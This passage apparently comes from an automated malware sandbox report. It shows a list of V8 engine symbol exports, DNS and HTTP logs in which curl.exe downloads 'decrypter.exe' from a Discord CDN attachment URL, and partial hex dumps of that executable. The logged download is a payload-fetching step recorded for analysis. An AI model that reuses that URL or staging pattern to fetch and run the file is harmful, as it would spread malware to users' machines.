                                                                                                                                                                                                        ?HeapConstantOf@compiler@internal@v8@@YA?AV?$Handle@VHeapObject@internal@v8@@@23@PEBVOperator@123@@Z80740x140eb3cc0
                                                                                                                                                                                                        ?HeapNumberMapConstant@JSGraph@compiler@internal@v8@@QEAAPEAVNode@234@XZ80750x140f562b0
                                                                                                                                                                                                        ?HeapNumberMapConstant@JSGraphAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VMap@internal@v8@@@34@XZ80760x140f5adb0
                                                                                                                                                                                                        ?HeapNumberShortPrint@HeapNumber@internal@v8@@QEAAXAEAV?$basic_ostream@DU?$char_traits@D@std@@@std@@@Z80770x140a321b0
                                                                                                                                                                                                        ?HeapNumberToString@Factory@internal@v8@@QEAA?AV?$Handle@VString@internal@v8@@@23@V?$Handle@VHeapNumber@internal@v8@@@23@NW4NumberCacheMode@23@@Z80780x1409d15e0
                                                                                                                                                                                                        ?HeapSizeFromPhysicalMemory@Heap@internal@v8@@SA_K_K@Z80790x1409ba8d0
                                                                                                                                                                                                        ?Heap_GenerationalBarrierForCodeSlow@internal@v8@@YAXVCode@12@PEAVRelocInfo@12@VHeapObject@12@@Z80800x1409ba9a0
                                                                                                                                                                                                        ?Heap_GenerationalBarrierSlow@internal@v8@@YAXVHeapObject@12@_K0@Z80810x1409b75d0
                                                                                                                                                                                                        ?Heap_GenerationalEphemeronKeyBarrierSlow@internal@v8@@YAXPEAVHeap@12@VEphemeronHashTable@12@_K@Z80820x1409ba9b0
                                                                                                                                                                                                        ?Heap_PageFlagsAreConsistent@internal@v8@@YA_NVHeapObject@12@@Z80830x1409ba9c0
                                                                                                                                                                                                        ?Heap_ValueMightRequireGenerationalWriteBarrier@internal@v8@@YA_NVHeapObject@12@@Z80840x1409ba9d0
                                                                                                                                                                                                        ?Heap_WriteBarrierForCodeSlow@internal@v8@@YAXVCode@12@@Z80850x1409ba9f0
                                                                                                                                                                                                        ?HideInternalNames@NameProvider@cppgc@@SA_NXZ80860x140078bb0
                                                                                                                                                                                                        ?HighResolutionNow@TimeTicks@base@v8@@SA?AV123@XZ80870x140e62600
                                                                                                                                                                                                        ?HintRegister@UsePosition@compiler@internal@v8@@QEBA_NPEAH@Z80880x140f86ba0
                                                                                                                                                                                                        ?HintTypeForOperand@UsePosition@compiler@internal@v8@@SA?AW4UsePositionHintType@234@AEBVInstructionOperand@234@@Z80890x140f86c20
                                                                                                                                                                                                        ?HoistSloppyBlockFunctions@DeclarationScope@internal@v8@@QEAAXPEAVAstNodeFactory@23@@Z80900x140af5780
                                                                                                                                                                                                        ?HolderIsReceiver@LookupIterator@internal@v8@@QEBA_NXZ80910x14081caa0
                                                                                                                                                                                                        ?HolderIsReceiverOrHiddenPrototype@LookupIterator@internal@v8@@QEBA_NXZ80920x14081cac0
                                                                                                                                                                                                        ?Hole@Type@compiler@internal@v8@@SA?AV1234@XZ80930x1404bc520
                                                                                                                                                                                                        ?Hurry@IncrementalMarking@internal@v8@@QEAAXXZ80940x1409a79a0
                                                                                                                                                                                                        ?I16x8Abs@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ80950x140ecb470
                                                                                                                                                                                                        ?I16x8Add@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ80960x140ecb480
                                                                                                                                                                                                        ?I16x8AddSatS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ80970x140ecb490
                                                                                                                                                                                                        ?I16x8AddSatU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ80980x140ecb4a0
                                                                                                                                                                                                        ?I16x8AllTrue@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ80990x140ecb4b0
                                                                                                                                                                                                        ?I16x8BitMask@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81000x140ecb4c0
                                                                                                                                                                                                        ?I16x8Eq@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81010x140ecb4d0
                                                                                                                                                                                                        ?I16x8ExtAddPairwiseI8x16S@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81020x140ecb4e0
                                                                                                                                                                                                        ?I16x8ExtAddPairwiseI8x16S@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@0@Z81030x140504ee0
                                                                                                                                                                                                        ?I16x8ExtAddPairwiseI8x16U@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81040x140ecb4f0
                                                                                                                                                                                                        ?I16x8ExtMulHighI8x16S@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81050x140ecb500
                                                                                                                                                                                                        ?I16x8ExtMulHighI8x16U@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81060x140ecb510
                                                                                                                                                                                                        ?I16x8ExtMulHighS@SharedTurboAssembler@internal@v8@@QEAAXVXMMRegister@23@000@Z81070x14051f450
                                                                                                                                                                                                        ?I16x8ExtMulHighU@SharedTurboAssembler@internal@v8@@QEAAXVXMMRegister@23@000@Z81080x14051f680
                                                                                                                                                                                                        ?I16x8ExtMulLow@SharedTurboAssembler@internal@v8@@QEAAXVXMMRegister@23@000_N@Z81090x14051f930
                                                                                                                                                                                                        ?I16x8ExtMulLowI8x16S@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81100x140ecb520
                                                                                                                                                                                                        ?I16x8ExtMulLowI8x16U@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81110x140ecb530
                                                                                                                                                                                                        ?I16x8ExtractLaneS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z81120x140ecb540
                                                                                                                                                                                                        ?I16x8ExtractLaneU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z81130x140ecb5e0
                                                                                                                                                                                                        ?I16x8GeS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81140x140ecb680
                                                                                                                                                                                                        ?I16x8GeU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81150x140ecb690
                                                                                                                                                                                                        ?I16x8GtS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81160x140ecb6a0
                                                                                                                                                                                                        ?I16x8GtU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81170x140ecb6b0
                                                                                                                                                                                                        ?I16x8MaxS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81180x140ecb6c0
                                                                                                                                                                                                        ?I16x8MaxU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81190x140ecb6d0
                                                                                                                                                                                                        ?I16x8MinS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81200x140ecb6e0
                                                                                                                                                                                                        ?I16x8MinU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81210x140ecb6f0
                                                                                                                                                                                                        ?I16x8Mul@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81220x140ecb700
                                                                                                                                                                                                        ?I16x8Ne@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81230x140ecb710
                                                                                                                                                                                                        ?I16x8Neg@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81240x140ecb720
                                                                                                                                                                                                        ?I16x8Q15MulRSatS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81250x140ecb730
                                                                                                                                                                                                        ?I16x8Q15MulRSatS@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@00@Z81260x140505080
                                                                                                                                                                                                        ?I16x8ReplaceLane@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z81270x140ecb740
                                                                                                                                                                                                        ?I16x8RoundingAverageU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81280x140ecb7e0
                                                                                                                                                                                                        ?I16x8SConvertI32x4@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81290x140ecb7f0
                                                                                                                                                                                                        ?I16x8SConvertI8x16High@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81300x140ecb800
                                                                                                                                                                                                        ?I16x8SConvertI8x16High@SharedTurboAssembler@internal@v8@@QEAAXVXMMRegister@23@0@Z81310x14051fb00
                                                                                                                                                                                                        ?I16x8SConvertI8x16Low@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81320x140ecb810
                                                                                                                                                                                                        ?I16x8Shl@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81330x140ecb820
                                                                                                                                                                                                        ?I16x8ShrS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81340x140ecb830
                                                                                                                                                                                                        ?I16x8ShrU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81350x140ecb840
                                                                                                                                                                                                        ?I16x8Splat@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81360x140ecb850
                                                                                                                                                                                                        ?I16x8Splat@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z81370x140f22ff0
                                                                                                                                                                                                        ?I16x8Sub@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81380x140ecb860
                                                                                                                                                                                                        ?I16x8SubSatS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81390x140ecb870
                                                                                                                                                                                                        ?I16x8SubSatU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81400x140ecb880
                                                                                                                                                                                                        ?I16x8UConvertI32x4@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81410x140ecb890
                                                                                                                                                                                                        ?I16x8UConvertI8x16High@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81420x140ecb8a0
                                                                                                                                                                                                        ?I16x8UConvertI8x16High@SharedTurboAssembler@internal@v8@@QEAAXVXMMRegister@23@00@Z81430x14051fbf0
                                                                                                                                                                                                        ?I16x8UConvertI8x16Low@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81440x140ecb8b0
                                                                                                                                                                                                        ?I32x4Abs@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81450x140ecb8c0
                                                                                                                                                                                                        ?I32x4Add@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81460x140ecb8d0
                                                                                                                                                                                                        ?I32x4AllTrue@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81470x140ecb8e0
                                                                                                                                                                                                        ?I32x4BitMask@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81480x140ecb8f0
                                                                                                                                                                                                        ?I32x4DotI16x8S@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81490x140ecb900
                                                                                                                                                                                                        ?I32x4Eq@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81500x140ecb910
                                                                                                                                                                                                        ?I32x4ExtAddPairwiseI16x8S@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81510x140ecb920
                                                                                                                                                                                                        ?I32x4ExtAddPairwiseI16x8U@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81520x140ecb930
                                                                                                                                                                                                        ?I32x4ExtAddPairwiseI16x8U@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@0@Z81530x140505290
                                                                                                                                                                                                        ?I32x4ExtMul@SharedTurboAssembler@internal@v8@@QEAAXVXMMRegister@23@000_N1@Z81540x14051fd00
                                                                                                                                                                                                        ?I32x4ExtMulHighI16x8S@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81550x140ecb940
                                                                                                                                                                                                        ?I32x4ExtMulHighI16x8U@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81560x140ecb950
                                                                                                                                                                                                        ?I32x4ExtMulLowI16x8S@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81570x140ecb960
                                                                                                                                                                                                        ?I32x4ExtMulLowI16x8U@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81580x140ecb970
                                                                                                                                                                                                        ?I32x4ExtractLane@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z81590x140ecb980
                                                                                                                                                                                                        ?I32x4GeS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81600x140ecba20
                                                                                                                                                                                                        ?I32x4GeU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81610x140ecba30
                                                                                                                                                                                                        ?I32x4GtS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81620x140ecba40
                                                                                                                                                                                                        ?I32x4GtU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81630x140ecba50
                                                                                                                                                                                                        ?I32x4MaxS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81640x140ecba60
                                                                                                                                                                                                        ?I32x4MaxU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81650x140ecba70
                                                                                                                                                                                                        ?I32x4MinS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81660x140ecba80
                                                                                                                                                                                                        ?I32x4MinU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81670x140ecba90
                                                                                                                                                                                                        ?I32x4Mul@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81680x140ecbaa0
                                                                                                                                                                                                        ?I32x4Ne@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81690x140ecbab0
                                                                                                                                                                                                        ?I32x4Neg@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81700x140ecbac0
                                                                                                                                                                                                        ?I32x4ReplaceLane@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@H@Z81710x140ecbad0
                                                                                                                                                                                                        ?I32x4SConvertF32x4@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81720x140ecbb70
                                                                                                                                                                                                        ?I32x4SConvertI16x8High@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81730x140ecbb80
                                                                                                                                                                                                        ?I32x4SConvertI16x8High@SharedTurboAssembler@internal@v8@@QEAAXVXMMRegister@23@0@Z81740x14051fea0
                                                                                                                                                                                                        ?I32x4SConvertI16x8Low@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81750x140ecbb90
                                                                                                                                                                                                        ?I32x4Shl@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81760x140ecbba0
                                                                                                                                                                                                        ?I32x4ShrS@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81770x140ecbbb0
                                                                                                                                                                                                        ?I32x4ShrU@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81780x140ecbbc0
                                                                                                                                                                                                        ?I32x4Splat@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81790x140ecbbd0
                                                                                                                                                                                                        ?I32x4Splat@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z81800x140f23030
                                                                                                                                                                                                        ?I32x4Sub@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81810x140ecbbe0
                                                                                                                                                                                                        ?I32x4TruncSatF64x2SZero@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81820x140ecbbf0
                                                                                                                                                                                                        ?I32x4TruncSatF64x2SZero@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@0@Z81830x1405054c0
                                                                                                                                                                                                        ?I32x4TruncSatF64x2UZero@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81840x140ecbc00
                                                                                                                                                                                                        ?I32x4TruncSatF64x2UZero@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@0@Z81850x140505720
                                                                                                                                                                                                        ?I32x4UConvertF32x4@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81860x140ecbc10
                                                                                                                                                                                                        ?I32x4UConvertI16x8High@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81870x140ecbc20
                                                                                                                                                                                                        ?I32x4UConvertI16x8High@SharedTurboAssembler@internal@v8@@QEAAXVXMMRegister@23@00@Z81880x14051ff90
                                                                                                                                                                                                        ?I32x4UConvertI16x8Low@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81890x140ecbc30
                                                                                                                                                                                                        ?I64x2Abs@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81900x140ecbc40
                                                                                                                                                                                                        ?I64x2Abs@SharedTurboAssembler@internal@v8@@QEAAXVXMMRegister@23@00@Z81910x1405200a0
                                                                                                                                                                                                        ?I64x2Add@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ81920x140ecbc50
                                                                                                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                        EnglishUnited States
                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                        Nov 14, 2024 05:15:15.807151079 CET192.168.2.51.1.1.10xca0dStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                        Nov 14, 2024 05:15:15.813796043 CET1.1.1.1192.168.2.50xca0dNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 14, 2024 05:15:15.813796043 CET1.1.1.1192.168.2.50xca0dNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 14, 2024 05:15:15.813796043 CET1.1.1.1192.168.2.50xca0dNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 14, 2024 05:15:15.813796043 CET1.1.1.1192.168.2.50xca0dNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Nov 14, 2024 05:15:15.813796043 CET1.1.1.1192.168.2.50xca0dNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        0192.168.2.549707162.159.135.2334436760C:\Windows\System32\curl.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-11-14 04:15:16 UTC240OUTGET /attachments/1167169926193229925/1306213355966435360/decrypter.exe?ex=6735d97c&is=673487fc&hm=3f582970dc363d475b432b390a941fae5b9a6a3f9388809e2d818b6f1c1f06ff& HTTP/1.1
                                                                                                                                                                                                        Host: cdn.discordapp.com
                                                                                                                                                                                                        User-Agent: curl/7.83.1
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        2024-11-14 04:15:16 UTC1212INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 04:15:16 GMT
                                                                                                                                                                                                        Content-Type: application/x-msdos-program
                                                                                                                                                                                                        Content-Length: 86458059
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        CF-Ray: 8e242df03c703162-DFW
                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes, bytes
                                                                                                                                                                                                        Age: 61353
                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                        Content-Disposition: attachment; filename="decrypter.exe"
                                                                                                                                                                                                        ETag: "419576a88d2eb1b14df6ec22f7579c67"
                                                                                                                                                                                                        Expires: Fri, 14 Nov 2025 04:15:16 GMT
                                                                                                                                                                                                        Last-Modified: Wed, 13 Nov 2024 11:05:32 GMT
                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        x-goog-generation: 1731495932416983
                                                                                                                                                                                                        x-goog-hash: crc32c=zSpqZA==
                                                                                                                                                                                                        x-goog-hash: md5=QZV2qI0usbFN9uwi91ecZw==
                                                                                                                                                                                                        x-goog-metageneration: 1
                                                                                                                                                                                                        x-goog-storage-class: STANDARD
                                                                                                                                                                                                        x-goog-stored-content-encoding: identity
                                                                                                                                                                                                        x-goog-stored-content-length: 86458059
                                                                                                                                                                                                        x-guploader-uploadid: AHmUCY18rUxyToQtzNC6mM7YhO19_BRkjnzzZgnZ0hydRXphJRlP8x5a1CoUGt_CujAZGgMNYxo
                                                                                                                                                                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                                                                        Set-Cookie: __cf_bm=UCA26eDhPuNmsEKg2kV98T5Le7vdchftJ9t_eLRuoLA-1731557716-1.0.1.1-Ruk7p2hF0ww59uNyOMpV_sFXecaB7duQazcVJK0NyKMqF_VM4uq7.3RkIbZV6DnCg8IkTxcFwJWkMpO6IZnxCA; path=/; expires=Thu, 14-Nov-24 04:45:16 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                        2024-11-14 04:15:16 UTC513INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 75 37 78 52 61 30 41 6d 59 48 4d 41 25 32 46 7a 67 4d 63 53 67 68 6a 68 51 59 64 4b 58 4e 50 75 65 6f 75 78 7a 39 75 33 44 38 67 46 4d 71 6e 71 56 58 34 59 53 49 56 66 76 78 79 53 53 61 38 58 58 77 41 35 4d 63 7a 52 71 61 56 51 41 32 63 46 6f 4f 56 4d 59 68 48 6f 45 48 6f 35 47 56 61 79 78 54 74 70 79 38 49 50 31 35 68 6c 32 39 30 38 7a 74 6c 59 41 67 53 6b 74 25 32 46 30 34 61 63 53 37 41 72 4e 68 4b 70 53 67 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30
                                                                                                                                                                                                        Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u7xRa0AmYHMA%2FzgMcSghjhQYdKXNPueouxz9u3D8gFMqnqVX4YSIVfvxySSa8XXwA5MczRqaVQA2cFoOVMYhHoEHo5GVayxTtpy8IP15hl2908ztlYAgSkt%2F04acS7ArNhKpSg%3D%3D"}],"group":"cf-nel","max_age":60
                                                                                                                                                                                                        2024-11-14 04:15:16 UTC1013INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 76 82 40 a2 32 e3 2e f1 32 e3 2e f1 32 e3 2e f1 e1 91 2d f0 2a e3 2e f1 e1 91 2b f0 e2 e3 2e f1 e1 91 2a f0 1c e3 2e f1 60 96 2a f0 21 e3 2e f1 60 96 2d f0 38 e3 2e f1 60 96 2b f0 53 e3 2e f1 54 8c d3 f1 3e e3 2e f1 32 e3 2e f1 2c e3 2e f1 f3 96 2d f0 30 e3 2e f1 f3 96 2b f0 50 e6 2e f1 f3 96 2a f0 63 e0 2e f1 e1 91 2f f0 25 e3 2e f1 32 e3 2f f1 a7 e2 2e f1 f3 96 27 f0 36 e3 2e
                                                                                                                                                                                                        Data Ascii: MZ@0!L!This program cannot be run in DOS mode.$v@2.2.2.-*.+.*.`*!.`-8.`+S.T>.2.,.-0.+P.*c./%.2/.'6.
                                                                                                                                                                                                        2024-11-14 04:15:16 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 49 89 d8 31 c0 0f a2 31 c0 81 fb 43 65 6e 74 75 12 81 fa 61 75 72 48 75 44 81 f9 61 75 6c 73 75 3c eb 18 81 fb 20 20 53 68 75 32 81 fa 61 6e 67 68 75 2a 81 f9 61 69 20 20 75 22 b8 00 00 00 c0 0f a2 89 c2 31 c0 81 fa 01 00 00 c0 72 0f b8 01 00 00 c0 0f a2 89 d0 83 e0 ef 83 c8 10 4c 89 c3 f3 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 8b 91 f0 00 00 00 8b 01 0f c8 89 01 48 8d 49 04 83 ea 01 75 f1 f3 c3 90 90 90 90 90 90 90 90 90 48 89 ca 9c 48 8d 05 65 78 ff 01 e8 10 00 00 00 48 8d 64 24 08 f3 c3 90 90 90 90 90 90 90 90 90 4c 8b 44 24 08 49 0f ba e0 1e 73 07 48 3b 10 74 02 9c 9d 48 89 10 f3 c3 90 90 90 90 90 90 90 90 9c 9d f3 c3 90 90 90 90 90 90 90 90 90 90 90 90 48 89 7c 24 08 48 89 74 24 10 48 89 e0 48 89 cf 48 89 d6 4c
                                                                                                                                                                                                        Data Ascii: I11CentuaurHuDaulsu< Shu2anghu*ai u"1rLHIuHHexHd$LD$IsH;tHH|$Ht$HHHL
                                                                                                                                                                                                        2024-11-14 04:15:16 UTC1369INData Raw: 43 e8 48 21 cd 48 29 e9 74 15 48 8d 42 f0 48 8d 5a 10 48 c1 e9 04 f3 0f a7 c8 48 85 ed 74 2a 49 89 f8 48 89 eb 48 89 e9 48 8d 2c 24 48 29 cc 48 c1 e9 03 48 8d 3c 24 f3 48 a5 49 8d 38 48 8d 34 24 48 89 d9 e9 b9 fe ff ff b8 01 00 00 00 48 8d 64 24 08 5b 5d 48 8b 7c 24 08 48 8b 74 24 10 f3 c3 90 48 89 7c 24 08 48 89 74 24 10 48 89 e0 48 89 cf 48 89 d6 4c 89 c2 4c 89 c9 55 53 31 c0 48 f7 c2 0f 00 00 00 0f 85 0d 02 00 00 48 f7 c1 0f 00 00 00 0f 85 00 02 00 00 48 8d 05 12 73 ff 01 9c fc e8 bb fa ff ff 48 8d 52 10 31 c0 31 db f7 02 20 00 00 00 0f 85 67 01 00 00 48 f7 c7 0f 00 00 00 0f 94 c0 48 f7 c6 0f 00 00 00 0f 94 c3 85 d8 0f 85 4b 01 00 00 48 f7 d8 bb 00 02 00 00 48 f7 d0 48 8d 2c 24 48 39 d9 48 0f 42 d9 48 21 d8 48 89 cb 48 f7 d8 48 81 e3 ff 01 00 00 48 8d
                                                                                                                                                                                                        Data Ascii: CH!H)tHBHZHHt*IHHH,$H)HH<$HI8H4$HHd$[]H|$Ht$H|$Ht$HHHLLUS1HHHsHR11 gHHKHHH,$H9HBH!HHHH
                                                                                                                                                                                                        2024-11-14 04:15:16 UTC1369INData Raw: 89 db 48 f7 c7 0f 00 00 00 74 11 48 89 d9 48 8d 34 24 48 c1 e9 03 f3 48 a5 48 29 df 4c 89 ce 4c 89 d1 48 01 df 48 01 de 48 29 d9 bb 00 02 00 00 0f 85 73 ff ff ff 48 39 ec 74 14 66 0f ef c0 48 8d 04 24 0f 29 00 48 8d 40 10 48 39 c5 77 f4 48 8d 65 00 eb 1d 90 90 90 90 48 8d 42 f0 48 8d 5a 10 48 c1 e9 04 f3 0f a7 e8 66 0f 6f 00 66 0f 7f 42 f0 b8 01 00 00 00 48 8d 64 24 08 5b 5d 48 8b 7c 24 08 48 8b 74 24 10 f3 c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 48 89 7c 24 08 48 89 74 24 10 48 89 e0 48 89 cf 48 89 d6 4c 89 c2 4c 89 c9 55 53 31 c0 48 f7 c2 0f 00 00 00 0f 85 d3 02 00 00 48 f7 c1 0f 00 00 00 0f 85 c6 02 00 00 48 8d 05 82 6d ff 01 9c fc e8 2b f5 ff ff 48 8d 52 10 31 c0 31 db f7 02 20 00 00 00 0f 85 d7 01 00 00 48 f7 c7 0f 00 00 00 0f 94 c0 48 f7 c6
                                                                                                                                                                                                        Data Ascii: HtHH4$HHH)LLHHH)sH9tfH$)H@H9wHeHBHZHfofBHd$[]H|$Ht$H|$Ht$HHHLLUS1HHHm+HR11 HH
